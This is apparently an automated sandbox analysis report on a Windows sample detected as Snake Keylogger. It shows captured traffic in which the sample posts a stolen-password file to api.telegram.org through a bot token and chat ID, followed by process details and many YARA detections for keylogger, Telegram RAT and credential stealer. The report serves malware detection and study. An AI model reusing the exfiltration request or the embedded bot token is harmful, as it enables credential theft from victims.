                                                                    2022-06-26 07:33:20 UTC166INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66857,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228800,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    99192.168.2.549946149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:20 UTC167OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ed97869e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:20 UTC167OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 64 39 37 38 36 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ed97869eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:21 UTC168INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:21 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:21 UTC168INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66858,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228801,"document":{"file_


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Target ID:0
                                                                    Start time:09:32:19
                                                                    Start date:26/06/2022
                                                                    Path:C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\0OZQi3b0tM.exe"
                                                                    Imagebase:0x530000
                                                                    File size:129537 bytes
                                                                    MD5 hash:A90C091ABDED4A4F763DE7537F569167
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738443207.0000000002ADD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737543287.0000000002958000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738278860.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737582921.000000000296C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738464278.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737477229.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737233949.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737426073.000000000292C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737400500.000000000291C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737877910.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737872155.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738102517.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737894796.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737177065.0000000002898000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737163773.0000000002894000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738298999.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737551923.000000000295C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737275091.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737205564.00000000028B7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737680246.0000000002990000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737438859.0000000002934000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737240182.00000000028CB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738349545.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738520206.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737615006.000000000297C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738206086.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737694580.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738046605.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737534636.0000000002954000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738084741.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738331335.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737246038.00000000028CF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737258885.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737950672.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738536747.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737218317.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737983761.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737998771.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737291941.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737504124.0000000002948000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737901412.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737883433.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737944111.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738244012.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737409041.0000000002920000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738141181.0000000002A95000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737889019.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737855627.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737285680.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738079094.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738039601.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738059775.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738194827.0000000002AA5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737190839.00000000028A7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737592635.0000000002970000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738181191.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737144637.000000000288C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737978655.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737655258.0000000002988000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737628909.0000000002980000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737833563.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737414593.0000000002924000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737929824.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737560330.0000000002960000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737825477.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738023885.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738485397.0000000002AE5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737575208.0000000002968000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737808101.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737431755.0000000002930000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737466902.0000000002940000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737280426.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737670833.000000000298C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737689328.0000000002994000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737225304.00000000028C3000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737609149.0000000002978000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737936851.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737641884.0000000002984000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738147230.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738223259.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738314614.0000000002AC5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737450837.0000000002938000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737597795.0000000002974000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738125525.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738160524.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738425558.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738406461.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738262050.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737864301.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737968200.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737263659.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737253851.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738109588.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737973247.0000000002A59000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737457876.000000000293C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737523761.0000000002950000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737154483.0000000002890000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737212904.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737268236.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737839802.00000000029F8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738270244.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738131471.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737420491.0000000002928000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738395968.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.738017194.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737513462.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.737567001.0000000002964000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000003.670353008.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low

